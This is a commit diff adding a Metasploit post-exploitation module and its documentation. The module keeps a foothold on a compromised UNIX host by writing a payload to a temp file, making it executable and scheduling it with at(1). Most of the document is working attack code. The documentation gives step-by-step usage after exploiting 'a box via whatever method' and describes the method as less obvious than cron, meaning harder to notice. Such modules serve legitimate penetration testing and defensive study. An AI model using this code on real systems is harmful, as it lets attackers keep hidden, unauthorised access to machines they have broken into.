Land rapid7#7310, at(1) persistence module

wvu · wvu · commit 934b05e73688 · 2016-12-22T03:33:58.000-06:00
diff --git a/documentation/modules/exploit/unix/local/at_persistence.md b/documentation/modules/exploit/unix/local/at_persistence.md
@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+This module executes a metasploit payload utilizing `at(1)` to execute jobs at a specific time.  It should work out of the box
+with any UNIX-like operating system with `atd` running.  In the case of OS X, the `atrun` service must be launched:
+
+```
+sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
+```
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use exploit/unix/local/at_persistence`
+  4. Do: `set session #`
+  5. Do: `set target #`
+  6. `exploit`
+
+
+## Options
+
+  **TIME**
+
+  When to run job via at(1).  Changing may require WfsDelay to be adjusted.
+
+  **PATH**
+
+  Path to store payload to be executed by at(1).  Leave unset to use mktemp.
+
+## Scenarios
+
+This module is useful for running one-shot payloads with delayed execution.It is slightly less obvious than cron.
diff --git a/modules/exploits/unix/local/at_persistence.rb b/modules/exploits/unix/local/at_persistence.rb
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'at(1) Persistence',
+        'Description'    => %q(
+          This module achieves persisience by executing payloads via at(1).
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Jon Hart <jon_hart@rapid7.com>'
+          ],
+        'Targets'        => [['Automatic', {} ]],
+        'DefaultTarget'  => 0,
+        'Platform'       => %w(unix),
+        'Arch'           => ARCH_CMD,
+        'DisclosureDate' => "Jan 1 1997" # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted.', 'now'])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('PATH', [false, 'Path to store payload to be executed by at(1).  Leave unset to use mktemp.'])
+      ]
+    )
+  end
+
+  def check
+    token = Rex::Text.rand_text_alphanumeric(8)
+    if cmd_exec("atq && echo #{token}").include?(token)
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NoAccess, 'User denied cron via at.deny')
+    end
+
+    unless (payload_file = (datastore['PATH'] || cmd_exec('mktemp')))
+      fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
+    end
+
+    write_file(payload_file, payload.encoded)
+    register_files_for_cleanup(payload_file)
+
+    cmd_exec("chmod 700 #{payload_file}")
+    cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
+
+    print_status("Waiting up to #{datastore['WfsDelay']}sec for execution")
+  end
+end
